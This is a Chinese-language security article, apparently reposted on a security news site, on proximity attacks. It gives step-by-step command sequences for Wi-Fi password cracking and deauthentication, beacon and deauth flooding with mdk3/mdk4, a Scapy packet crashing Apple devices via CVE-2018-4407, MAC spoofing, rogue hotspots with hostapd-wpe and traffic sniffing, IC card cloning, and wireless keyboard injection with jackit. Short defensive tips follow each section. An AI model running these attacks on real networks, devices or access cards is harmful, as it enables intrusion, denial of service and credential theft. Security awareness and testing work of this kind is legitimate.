揭秘常见的几种近源攻击的方式,提高防御意识。

admin 2024年9月28日11:19:17评论0 views字数 5292阅读17分38秒阅读模式

此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

WI-FI破解

wifite

Kali下工具wifite,加载网卡,开启监听模式,#airmon-ng check kill>airmon-ng start wlan1安装hcxtools v4.2.0或更高版本,hcxdumptool v4.2.0或更高版本>apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev>git clone https://github.com/ZerBea/hcxtools>cd hcxtools>make>make install >git clone https://github.com/ZerBea/hcxdumptool>cd hcxdumptool>make>make install>wifite –-dict /root/Desktop/wordlist.txt  加载

Aircrack-ng

>airmon-ng start wlan0 开启监听模式>airodump-ng wlan0mon  查看数据包>airodump-ng –c 1 –bssid APmac –w name wlan1mon保存某AP数据包>aireplay-ng –deauth 10 –a APmac wlan0mon  deauth攻击>aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon deauth攻击某个设备直至获取handshake(握手包)>airmon-ng stop wlan0mon  关闭监听模式>aircrack-ng –w wordlist.txt name.cap 指定字典破解密码

三沐提醒:

        1、如果接入点和客户端设备能够支持WPA3,请尽快使用这种最新的无线网路安全标准。WPA2仍然也是不错的选择,但是WPA3可以提供的防护能力将更加可靠和完善。
  2、为每个无线网络接入点设置一个独特的、难以猜到的强密码。
  3、确保所有网络组件版本及时更新并合理配置,最大限度地减少可利用的漏洞。
  4、尽量减少或禁止接入点的远程访问,始终将默认接入点密码改为独特的、难以破解的密码。这可以阻止随意性的攻击者通过互联网连接到接入点,并轻松获得控制权。
  除了这些基础无线安全措施外,有条件的企业组织还应该为其无线网络实施以下安全控制措施:
  1、将无线网络与其他网络系统区分开。这常常可以使用防火墙、虚拟局域网或其他网络边界执行技术来实现,同时执行限制流量进出的安全策略。
  2、部署无线网络特有的安全技术。这包括无线入侵防御系统以及无线网络安全控制器。
  3、应定期开展安全意识培训活动,向员工宣讲无线网络攻击和安全最佳实践。建议员工避免使用开放网络。

无线干扰

   Beacon flood
需切换网卡为监听模式>airmon-ng start wlan1创建大量虚假热点Mdk3 mon0 b>mdk3 wlan1mon b -f /root/wifi.txt -a -s 1500
      Deauth flood
针对AP>airmon-ng start wlan1>aireplay-ng –deauth 10 –a AP's mac address mon0针对AP内设备>airmon-ng start wlan1       将网卡置为监听模式>airodump-ng wlan1mon –bssid 目标ap的ssid>aireplay-ng -0 0 -a ap的ssid -c AP的ssid wlan0mon 开始攻击
           Mdk3 destruction
针对范围内>mdk3 wlan1mon d针对AP>airodump-ng wlan1mon>mdk3 wlan1mon a -a APmac 发起攻击黑名单>mdk3 wlan1mon d –c 信道 –b /blacklist.txt.>mdk3 wlan1mon  b -n test -w -g -c 1 -s 200

WiFi芯片esp8266

Mdk4

>mdk4 wlan0mon d

CVE-2018-4407

Scapysend(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))Apple iOS 11及更早版本:所有设备(升级到iOS 12的部分设备)Apple macOS High Sierra(受影响的最高版本为10.13.6):所有设备(通过安全更新2018-001修复)Apple macOS Sierra(受影响的最高版本为10.12.6):所有设备(通过安全更新2018-005中修复)Apple OS X El Capitan及更早版本:所有设备

绕过mac地址认证

Ifconfig

>ifconfig wlan1 down>ifconfig wlan1 hw ether xx:xx:xx:xx:xx:xx>ifconfig wlan1 up

Macchanger

>macchangerm xx:xx:xx:xx:xx:xx wlan1>macchangerr wlan1

钓鱼网络

Hostapd

>apt install hostapd dnsmasq>cd /etc/hostapd>vim open.conf 创建无加密热点Interface=wlan1Ssid=FreeWIFIDriver=nl80211Channel=1Hw_mode=g>vim /etc/dnsmasq.confDhcp-range=10.0.0.1, 10.0.0.255,12hInterface=wlan1>systemctl restart dnsmasq消除网卡限制>nmcli radio wifi off>rfkill unblock wlan>ifconfig wlan1 10.0.0.1/24>hostapd open.conf嗅探>sysctl –w net.ipv4.ip_forward=1>iptables –t nat –A POSTROUTING –o 网卡 –j MASQUERADE>bettercap –iface wlan1>net.show>net.sniff on>driftnet –i wlan1

Hostapd-wpe

>apt install hostapd-wpe>vim /etc/hostapd-wpe/hostapd-wpe.conf配置interface=wlan1Ssid=Channel=证书修改>cd /etc/hostapd-wpe/certs/文件ca.cnf server.cnf client.cnf修改countrName stateOrProvinceName localityName …….>rm –rf *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt*>make clean>./bootstrap>make install执行创建热点>hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf获取到密码时使用asleep破解>asleap –C Challenge值 –R response值 –W 字典文件

三沐提醒:

1、拒绝来源不明的热点网络。设置钓鱼Wi-Fi陷阱的黑客大多利用的是用户想要免费蹭网的占便宜心理。因此要想避免堕入类似陷阱,首先要做到的就是尽量不要使用来源不明的Wi-Fi,尤其是免费又不需密码的Wi-Fi。   
2、及时更新升级浏览器。用户在使用非加密的Wi-Fi网络或者陌生的Wi-Fi网络时,最好提前在笔记本电脑或智能手机中安装一些安全防范软件以作提防。针对最容易泄露用户信息的浏览器软件,用户除了要在官方网站进行下载的和安装之外,还要养成定时更新升级的好习惯。使用浏览器登录网站时,如果碰到需要用户输入账户名和密码并弹出“是否记住密码”选项框的情况,最好不要选择“记住密码”,因为“记住密码”功能会将用户的账号信息存储到浏览器的缓存文件夹中,无形中方便了黑客窃取。   
3、手机软件设置莫偷懒。智能手机用户在日常使用时最好关闭Wi-Fi自动连接这项功能。因为如果这项功能打开的话,手机在进入有Wi-Fi网络的区域就会自动扫描并连接上不设密码的Wi-Fi网络,这无疑会大大增加用户误连钓鱼Wi-Fi的几率,为了一时方便而留下安全隐患,未免有些得不偿失。用户在使用智能手机登录手机银行或者支付宝、财付通的金融服务类网站时,最好不要直接通过手机浏览器进行,优先考虑使用银行或者第三方支付公司推出的专用应用程序,这些程序的安全性要比开放的手机浏览器高上不少。

BadUSB

揭秘常见的几种近源攻击的方式,提高防御意识。

特点:支持设置冲突解决方案支持选择性复制,包括扩展名黑白名单、磁盘黑白名单。磁盘黑白名单支持序列号白名单模式结合版本控制可以方便地备份U盘支持隐藏模式及开机启动支持设置回调,可以自己编写代码实现某种高级的、程序没有提供的功能。默认提供Git版本控制支持支持限制文件大小,防止复制大文件造成延误支持延迟复制,对“偷”课件类的场景提升用户体验十分有用

揭秘常见的几种近源攻击的方式,提高防御意识。

USB 设备和按键注入攻击的危险性OPSWAT

三沐提醒:

1.禁用自动运行功能:关闭USB接口的自动运行功能,防止病毒通过USB设备自动执行。该系统可以帮助管理员设置USB接口的安全策略,禁止自动运行功能,降低感染病毒的风险。

2.谨慎使用未知USB设备:在使用USB设备前,先进行安全检查和验证,确保设备来源可靠、无病毒。该系统可以集成设备认证功能,对连接的USB设备进行身份验证和授权管理,防止未经授权的USB设备接入系统。

3.加密存储数据:使用支持硬件加密的USB存储设备,确保数据在传输和存储过程中的安全性。该系统支持对文件进行透明加密,防止数据在USB设备上被非法访问或窃取。

4.监控USB使用行为:对USB设备的使用进行实时监控和记录,及时发现异常行为。该系统提供实时屏幕监控和上网行为管理功能,能够记录和分析USB设备的使用情况,发现潜在的安全风险。

5.设定USB访问权限:根据用户的职责和权限,设定不同的USB访问权限。该系统支持分部门部署加密方案,对不同部门或用户的USB访问权限进行精细化管理,确保重要数据只能在授权范围内使用。

6.定期审计和检查:定期对USB设备的使用情况进行审计和检查,确保安全策略得到有效执行。该系统提供数据监控和审计功能,能够记录和分析USB设备的使用情况,为管理员提供全面的安全审计支持。

克隆卡

(1)使用软件连接读卡器:

揭秘常见的几种近源攻击的方式,提高防御意识。

(2)dump出卡的内容:

揭秘常见的几种近源攻击的方式,提高防御意识。

揭秘常见的几种近源攻击的方式,提高防御意识。

(3)使用克隆软件将dump的内容拷贝至空卡中:

连接->写卡

揭秘常见的几种近源攻击的方式,提高防御意识。

(4)但是上面的工具有的时候只针对与特定的读卡器,反正我是没成功,用了下面这款才成功的:

揭秘常见的几种近源攻击的方式,提高防御意识。

 点击读IC卡,然后操作与之前一致:

揭秘常见的几种近源攻击的方式,提高防御意识。

然后导出dump文件后,将dump文件写入另一张IC卡即可:

揭秘常见的几种近源攻击的方式,提高防御意识。

另一种方法是直接选择“写IC卡”:

揭秘常见的几种近源攻击的方式,提高防御意识。

三沐提醒:

逻辑安全方面,存储器分区保护区分公开、工作和保密区域,用户鉴别包括PIN验证、生物识别,如指纹识别。指纹识别技术利用指纹的唯一性,结合IC卡的特性,实现身份真实认证和数据保护,是信息安全的重要补充。

指纹IC卡技术在各种应用场景中广泛应用,如网络通信、数据库管理、电子商务和电子支付等,尤其在管理员身份认证、权限管理、密钥保护等关键环节中发挥重要作用。通过活体指纹验证和双重认证,增强了系统的可靠性和安全性。

蓝牙攻击

这里主要使用的工具为jackit,攻击机环境为kali

git clone https://github.com/insecurityofthings/jackitcd jackitpip2 install -e .sudo jackit --script examples/test.txt

test.txt的内容为键盘执行的命令,在example目录下有很多案例,根据实际情况更改命令即可

揭秘常见的几种近源攻击的方式,提高防御意识。

运行截图

揭秘常见的几种近源攻击的方式,提高防御意识。

过几秒后就会看到嗅探到了很多设备(注意:距离目标1.5m内甚至更近才能嗅探到并攻击成功,距离太远会失败)

揭秘常见的几种近源攻击的方式,提高防御意识。

这时按control+c,会提示输入选择攻击的目标,一般这里直接输入all,表示对所有嗅探到的设备进行攻击

揭秘常见的几种近源攻击的方式,提高防御意识。

三沐提醒:

1、在不使用蓝牙时关闭它,以减少被黑客攻击的风险。

2、保持设备和操作系统更新至最新版本,确保蓝牙技术得到及时修复和安全漏洞的解决。

3、仅与可信设备进行蓝牙配对,确保其他设备也使用最新的蓝牙技术,以降低数据拦截的风险。

4、使用虚拟专用网络(VPN)加密数据,增强设备的安全性。选择一个提供强大加密协议和多个服务器位置的VPN,这不仅可以提高安全性,还能让人们访问受地理限制的内容,并实现匿名浏览互联网。

原文始发于微信公众号(三沐数安):揭秘常见的几种近源攻击的方式,提高防御意识。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日11:19:17
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   揭秘常见的几种近源攻击的方式,提高防御意识。https://cn-sec.com/archives/3101449.html

发表评论

匿名网友 填写信息